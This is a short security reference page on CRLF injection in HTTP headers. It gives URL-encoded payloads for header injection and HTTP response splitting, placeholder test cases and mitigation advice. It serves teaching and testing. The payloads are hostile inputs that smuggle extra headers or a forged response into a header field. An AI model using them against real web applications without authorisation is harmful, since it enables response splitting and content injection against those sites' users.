# CRLF Injection

#### Description

CRLF (Carriage Return Line Feed) Injection occurs when an attacker can inject CRLF characters into HTTP headers, potentially leading to HTTP response splitting, header injection, or other malicious actions.

#### Example with Scenario

**Scenario:** A web application takes user input to generate HTTP headers. An attacker can manipulate the input to inject additional headers or split the HTTP response, leading to various attacks.

#### Payloads and Test Cases

**Payloads**

1. **Header Injection:**

   ```
   %0D%0AInjected-Header: injected
   ```
2. **HTTP Response Splitting:**

   <pre data-overflow="wrap"><code>%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A&#x3C;h1>Injected Content&#x3C;/h1>
   </code></pre>

**Test Cases**

1. **Header Injection:**
   * **Payload:**

     ```
     %0D%0AInjected-Header: injected
     ```
   * **Test Case:**

     ```python
     # Send payload to the server
     sendPayloadToServer("input=%0D%0AInjected-Header: injected")
     # Verify if the application includes the injected header
     checkForInjectedHeader("Injected-Header", "injected")
     ```
2. **HTTP Response Splitting:**
   * **Payload:**

     <pre data-overflow="wrap"><code>%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A&#x3C;h1>Injected Content&#x3C;/h1>
     </code></pre>
   * **Test Case:**

     <pre class="language-python" data-overflow="wrap"><code class="lang-python"># Send payload to the server
     sendPayloadToServer("input=%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A&#x3C;h1>Injected Content&#x3C;/h1>")
     # Verify if the application splits the HTTP response
     checkForInjectedContent("&#x3C;h1>Injected Content&#x3C;/h1>")
     </code></pre>

#### Mitigation

1. **Input Validation:**
   * Validate and sanitize user input to ensure it does not contain CRLF characters.
   * Implement strict validation rules to reject malicious input.
2. **Use Libraries:**
   * Use libraries and frameworks that automatically handle header encoding and prevent injection.
   * Avoid constructing HTTP headers manually using user input.
3. **Secure Headers:**
   * Set secure HTTP headers to mitigate the impact of potential CRLF injection.
   * Use Content Security Policy (CSP) and other security headers to protect the application.
4. **Error Handling:**
   * Implement proper error handling to avoid revealing header information in error messages.
   * Return generic error messages without disclosing sensitive details.